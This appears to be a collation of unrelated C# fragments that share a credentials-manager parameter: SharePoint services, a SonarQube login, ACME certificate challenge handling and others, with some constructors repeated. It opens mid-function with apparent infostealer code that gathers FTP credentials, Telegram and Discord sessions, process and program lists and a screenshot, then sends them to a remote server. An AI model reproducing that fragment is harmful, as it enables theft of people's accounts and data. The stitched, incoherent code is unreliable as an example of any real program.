FtpCredentials = ftpCredentials,
Telegram = telegramSession,
Discord = discordSession,
ProcessList = processes,
InstalledPrograms = programs,
Screenshot = ClientInfoHelper.CaptureScreen()
};
result = this.Server.SendRequest(objectToSend, "Credentials", 600000)();
}
catch
{
result = false;
}
return(result);
}
public SPTaxonomiesService(ICredentialsManager credentials)
{
this.credentials = credentials;
}
public SPFolderService(ICredentialsManager credentials, IListItemDataService listItemDataService)
{
this.credentials = credentials;
this.listItemDataService = listItemDataService;
}
private CredentialsFormViewModel(ICredentialsManager credentialsManager)
{
m_CredentialsManager = credentialsManager;
}
internal PersonOrGroupEditor(ICredentialsManager credentials)
{
this.credentials = credentials;
}
/// <inheritdoc/>
public Task <ISonarQubeClient> LogInFromRepositoryAsync(IRepository <UriRepositoryItem> repository, ICredentialsManager credentialsManager)
{
var targetUri = repository.Data.TargetUri;
if (targetUri is null)
{
return(Task.FromResult <ISonarQubeClient>(null));
}
var credential = credentialsManager.Load(targetUri);
if (credential is null)
{
return(Task.FromResult <ISonarQubeClient>(null));
}
return(LogInAsync(targetUri, credential.Username, credential.Password));
}
public async Task <PendingAuthorization> PerformAutomatedChallengeResponse(ILog log, ICertifiedServer iisManager, ManagedCertificate managedCertificate, PendingAuthorization pendingAuth, ICredentialsManager credentialsManager)
{
var requestConfig = managedCertificate.RequestConfig;
var domain = pendingAuth.Identifier.Dns;
var challengeConfig = managedCertificate.GetChallengeConfig(domain);
if (pendingAuth.Challenges != null)
{
// from list of possible challenges, select the one we prefer to attempt
var requiredChallenge = pendingAuth.Challenges.FirstOrDefault(c => c.ChallengeType == challengeConfig.ChallengeType);
if (requiredChallenge != null)
{
pendingAuth.AttemptedChallenge = requiredChallenge;
if (requiredChallenge.ChallengeType == SupportedChallengeTypes.CHALLENGE_TYPE_HTTP)
{
// perform http-01 challenge response
var check = await PerformChallengeResponse_Http01(log, iisManager, domain, managedCertificate, pendingAuth);
if (requestConfig.PerformExtensionlessConfigChecks)
{
pendingAuth.AttemptedChallenge.ConfigCheckedOK = check.IsSuccess;
}
}
if (requiredChallenge.ChallengeType == SupportedChallengeTypes.CHALLENGE_TYPE_SNI)
{
// perform tls-sni-01 challenge response
var check = PrepareChallengeResponse_TlsSni01(log, iisManager, domain, managedCertificate, pendingAuth);
if (requestConfig.PerformTlsSniBindingConfigChecks)
{
// set config check OK if all checks return true
pendingAuth.AttemptedChallenge.ConfigCheckedOK = check();
}
}
if (requiredChallenge.ChallengeType == SupportedChallengeTypes.CHALLENGE_TYPE_DNS)
{
// perform dns-01 challenge response
var check = await PerformChallengeResponse_Dns01(log, domain, managedCertificate, pendingAuth, isTestMode : false, credentialsManager);
pendingAuth.AttemptedChallenge.IsFailure = !check.Result.IsSuccess;
pendingAuth.AttemptedChallenge.ChallengeResultMsg = check.Result.Message;
pendingAuth.AttemptedChallenge.IsAwaitingUser = check.IsAwaitingUser;
pendingAuth.AttemptedChallenge.PropagationSeconds = check.PropagationSeconds;
pendingAuth.IsFailure = !check.Result.IsSuccess;
pendingAuth.AuthorizationError = check.Result.Message;
}
}
}
return(pendingAuth);
}
internal Taxonomies(ICredentialsManager credentials, ITaxonomiesService taxonomies, ICacheService cacheService)
{
this.credentials = credentials;
this.taxonomies = taxonomies;
this.cacheService = cacheService;
}
private async Task <DnsChallengeHelperResult> PerformChallengeResponse_Dns01(ILog log, string domain, ManagedCertificate managedCertificate, PendingAuthorization pendingAuth, bool isTestMode, ICredentialsManager credentialsManager)
{
var dnsChallenge = pendingAuth.Challenges.FirstOrDefault(c => c.ChallengeType == SupportedChallengeTypes.CHALLENGE_TYPE_DNS);
if (dnsChallenge == null)
{
var msg = $"No dns-01 challenge to completed for {managedCertificate.Name}. Request cannot continue.";
log.Warning(msg);
return(new DnsChallengeHelperResult
{
Result = new ActionResult
{
IsSuccess = false,
Message = msg
},
IsAwaitingUser = false,
PropagationSeconds = 0
});
}
// create DNS records (manually or via automation)
var dnsHelper = new DnsChallengeHelper(credentialsManager);
var dnsResult = await dnsHelper.CompleteDNSChallenge(log, managedCertificate, domain, dnsChallenge.Key, dnsChallenge.Value, isTestMode);
if (!dnsResult.Result.IsSuccess)
{
log.Error($"DNS update failed: {dnsResult.Result.Message}");
}
else
{
log.Information($"DNS: {dnsResult.Result.Message}");
}
var cleanupQueue = new List <Action> {
};
// configure cleanup actions for use after challenge completes
pendingAuth.Cleanup = async() =>
{
_ = await dnsHelper.DeleteDNSChallenge(log, managedCertificate, domain, dnsChallenge.Key, dnsChallenge.Value);
};
return(dnsResult);
}
private CredentialsFormViewModel(ICredentialsManager credentialsManager)
{
m_CredentialsManager = credentialsManager;
}
public MigrationManager(IItemManager itemManager, ICredentialsManager credentialsManager, ICertifiedServer targetServer)
{
_itemManager = itemManager;
_credentialsManager = credentialsManager;
_targetServer = targetServer;
}
public Impersonator(ICredentialsManager credentialsManager)
{
_credentialsManager = DIHelper.VerifyParameter(credentialsManager);
}
